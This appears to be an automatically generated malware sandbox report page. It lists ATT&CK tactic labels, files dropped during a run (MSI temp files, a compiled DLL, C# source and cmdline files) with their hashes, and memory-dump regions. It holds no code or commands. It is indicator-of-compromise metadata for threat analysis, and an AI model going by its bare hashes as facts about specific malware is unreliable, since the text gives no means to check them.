Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\f768baf.rbs

Filesize
2KB

MD5
b3d9d4dbfbe2379c1e76b5a384a082b0

SHA1
0ae60dc073d2320f53403284fe74e25f3dd09d08

SHA256
4a630045ddc6c5059196ca4e209f1238e2fd4a5b04402564fc73bd9b05f12486

SHA512
2e2a3e4e9931c264de7641b36927595f9ffb07be81102b71918a207d4e806b323fb546fe710ba1cbac5a01cd73ed92daf286c408ee2054488adb82e5b43f422d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7D2C.tmp

Filesize
1KB

MD5
5b02ad8f68e3d0f3c64b06a525f4e0e6

SHA1
0197fc25890b5a02cad9c7c866759ff7624d097a

SHA256
b153663926ed99d8da2072bae2b782b27593bc41f255c897c546c4c3a19c8d5a

SHA512
6b4c36d43c9d16b598f2cd8e315701beed91703c6af2bddc12a3a69144777e9de5b40fd43f9e8834a7f284fe8b1e696fc4266ea3949e5787a83e657a91f36c6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\wgi_mj_m.dll

Filesize
3KB

MD5
041e7c89754453002fe7dd75850308ea

SHA1
a4d88f2421cc5aac0ea0804a2ffedf7fab4450ad

SHA256
bcb25f659b319d294580b68c9fa42cd370441c87dd87c7ed994ab0a7f5a9ee57

SHA512
2519d036e53c0a577e555ef8b664c748544fa8cb8764ef3abfd0cf5be5baa273e7d37ffa07db534ff83077f4821d03bad204535aea7c188a2c5dc4a92922f024

Download Submit
C:\Users\Admin\AppData\Local\Temp\wgi_mj_m.pdb

Filesize
7KB

MD5
ae876ec12e84bb7c80e1ad1f63f6d424

SHA1
69c42c4b18becb8d59d9fec00246f1710f4950cb

SHA256
6c2d8c90f19e9449b1d23748fb9b2f45f96679dcc318de535b1aaa22ab4f248c

SHA512
b78c5595a71b46804d69897b868549af25b7af0fe7578bb93248e114ebd760b2b6416afe491d55e61a03e5aa6d44338ec62b7844ef5e86dc7dfed371dd69c558

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\30V4F5FIYBI1D0DE9OKB.temp

Filesize
7KB

MD5
bf6d377ac754794f44dbb8eabaca3507

SHA1
6538fa918c9a8ab7f8a0b91d9e8b9862ae0b4b0c

SHA256
0554e56ed668582135f30906e9a6950dc32da20ae172c8000ca0726b55987a50

SHA512
599a39655e23de5aaaf3b8339caeb96bb5e43a8a75822f29ad06575266058935af17dd4ac4125067c973daf68f3c46a35e60ba5eecc91fd97dcdc259065af6a0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
bf6d377ac754794f44dbb8eabaca3507

SHA1
6538fa918c9a8ab7f8a0b91d9e8b9862ae0b4b0c

SHA256
0554e56ed668582135f30906e9a6950dc32da20ae172c8000ca0726b55987a50

SHA512
599a39655e23de5aaaf3b8339caeb96bb5e43a8a75822f29ad06575266058935af17dd4ac4125067c973daf68f3c46a35e60ba5eecc91fd97dcdc259065af6a0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
bf6d377ac754794f44dbb8eabaca3507

SHA1
6538fa918c9a8ab7f8a0b91d9e8b9862ae0b4b0c

SHA256
0554e56ed668582135f30906e9a6950dc32da20ae172c8000ca0726b55987a50

SHA512
599a39655e23de5aaaf3b8339caeb96bb5e43a8a75822f29ad06575266058935af17dd4ac4125067c973daf68f3c46a35e60ba5eecc91fd97dcdc259065af6a0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
bf6d377ac754794f44dbb8eabaca3507

SHA1
6538fa918c9a8ab7f8a0b91d9e8b9862ae0b4b0c

SHA256
0554e56ed668582135f30906e9a6950dc32da20ae172c8000ca0726b55987a50

SHA512
599a39655e23de5aaaf3b8339caeb96bb5e43a8a75822f29ad06575266058935af17dd4ac4125067c973daf68f3c46a35e60ba5eecc91fd97dcdc259065af6a0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
bf6d377ac754794f44dbb8eabaca3507

SHA1
6538fa918c9a8ab7f8a0b91d9e8b9862ae0b4b0c

SHA256
0554e56ed668582135f30906e9a6950dc32da20ae172c8000ca0726b55987a50

SHA512
599a39655e23de5aaaf3b8339caeb96bb5e43a8a75822f29ad06575266058935af17dd4ac4125067c973daf68f3c46a35e60ba5eecc91fd97dcdc259065af6a0

Download Submit
C:\Windows\Installer\MSI8279.tmp

Filesize
2.9MB

MD5
eb9a4cf233789b96f940be0186a26988

SHA1
002a1cee740fa212732379d1f00dbcf7c0cccbf2

SHA256
24d40ba4bf19e3cb942918eb8091ab467b11d5d737aef8e37cffc5306d0081d8

SHA512
725eefc24cf43ad0d5022f20608b1d149e9a4285cde7dc21b621aca3647d402a2ac7a2c0751614bae5f6d98c2b52e280e471f7f67f8916041c042bd1911784ce

Download Submit
C:\Windows\Installer\MSI8779.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI898C.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI8A48.tmp

Filesize
537KB

MD5
d7ec04b009302b83da506b9c63ca775c

SHA1
6fa9ea09b71531754b4cd05814a91032229834c0

SHA256
00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

SHA512
171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

Download Submit
C:\Windows\Installer\MSI8AF5.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI8AF5.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC7D2B.tmp

Filesize
652B

MD5
278e6586a3b0718ed8eaa2554253c42b

SHA1
7dccf63389917dcd3ad148ee5effe06e72c5c9c9

SHA256
c64816be54c8dddbfdb10e9903de226b1026e66e1db70547980744425b3642d0

SHA512
e517f4d0d24372239443f211840e16255fae90816623722fa8bb733f3d6b47ac09576a17fac19262bbaf862e8c00c30062d23a47e64c11e975a85e50857bb4df

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wgi_mj_m.0.cs

Filesize
354B

MD5
5cc66596055771b708c426b09785ed18

SHA1
fe11be68b5f5f01304e2c6b62458ba70ccc9a575

SHA256
530c7292814fa916aa2846672d0bd17cb4ba54cb8f4f61b9d84e01a51b857c08

SHA512
dc0c9385a85ade45584fc782de2ab285d5ceb535d0ef6d19b610e34c1fde5e6e76fc88d0b6b0e9f922562c4fe26aaaccf6204fae5053e3679f3a104cbf2dfd5c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wgi_mj_m.cmdline

Filesize
309B

MD5
ccf501c85806791ffd42898dfd502d2a

SHA1
11f79196e62769cb7e9d2af2f26493969e086e27

SHA256
fa157ae18d94a8a4bc95b8631fcc3488771f1b65082f159e99b8fd14764e6ca2

SHA512
405b5fb2236003c8d5f2be0ed8ab7bb98bdcc038b7c970eb022a19f885e73fd95fcb7f2f057d0d9ab2f62fd9431e6f4b03fddff982a88f79087c918530a51b3a

Download Submit
\Windows\Installer\MSI8779.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
\Windows\Installer\MSI898C.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
\Windows\Installer\MSI8A48.tmp

Filesize
537KB

MD5
d7ec04b009302b83da506b9c63ca775c

SHA1
6fa9ea09b71531754b4cd05814a91032229834c0

SHA256
00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

SHA512
171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

Download Submit
\Windows\Installer\MSI8AF5.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
memory/2016-33-0x0000000000350000-0x0000000000450000-memory.dmp

Filesize
1024KB

Download
memory/2016-8-0x0000000000350000-0x0000000000450000-memory.dmp

Filesize
1024KB

Download
memory/2016-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2016-7-0x0000000000350000-0x0000000000450000-memory.dmp

Filesize
1024KB

Download
memory/2016-6-0x0000000000350000-0x0000000000450000-memory.dmp

Filesize
1024KB

Download
memory/2016-25-0x000000007149D000-0x00000000714A8000-memory.dmp

Filesize
44KB

Download
memory/2016-0-0x000000002FA01000-0x000000002FA02000-memory.dmp

Filesize
4KB

Download
memory/2016-2-0x000000007149D000-0x00000000714A8000-memory.dmp

Filesize
44KB

Download
memory/2256-102-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2256-103-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2256-104-0x0000000001E80000-0x0000000001EC0000-memory.dmp

Filesize
256KB

Download
memory/2256-105-0x0000000001E80000-0x0000000001EC0000-memory.dmp

Filesize
256KB

Download
memory/2256-106-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2256-107-0x0000000001E80000-0x0000000001EC0000-memory.dmp

Filesize
256KB

Download
memory/2256-108-0x0000000001E80000-0x0000000001EC0000-memory.dmp

Filesize
256KB

Download
memory/2612-64-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2612-27-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2612-26-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2644-12-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2644-13-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2644-14-0x00000000023D0000-0x0000000002410000-memory.dmp

Filesize
256KB

Download
memory/2644-15-0x00000000023D0000-0x0000000002410000-memory.dmp

Filesize
256KB

Download
memory/2644-40-0x00000000023D0000-0x0000000002410000-memory.dmp

Filesize
256KB

Download
memory/2644-46-0x00000000023D0000-0x0000000002410000-memory.dmp

Filesize
256KB

Download
memory/2644-34-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2748-48-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2748-126-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2748-47-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2748-101-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2812-87-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2812-37-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2812-36-0x0000000002580000-0x00000000025C0000-memory.dmp

Filesize
256KB

Download
memory/2812-39-0x0000000002580000-0x00000000025C0000-memory.dmp

Filesize
256KB

Download
memory/2812-35-0x000000006ADC0000-0x000000006B36B000-memory.dmp

Filesize
5.7MB

Download
memory/2812-88-0x0000000002580000-0x00000000025C0000-memory.dmp

Filesize
256KB

Download
memory/2812-90-0x0000000002580000-0x00000000025C0000-memory.dmp

Filesize
256KB

Download
memory/2812-38-0x0000000002580000-0x00000000025C0000-memory.dmp

Filesize
256KB

Download
memory/2812-89-0x0000000002580000-0x00000000025C0000-memory.dmp

Filesize
256KB

Download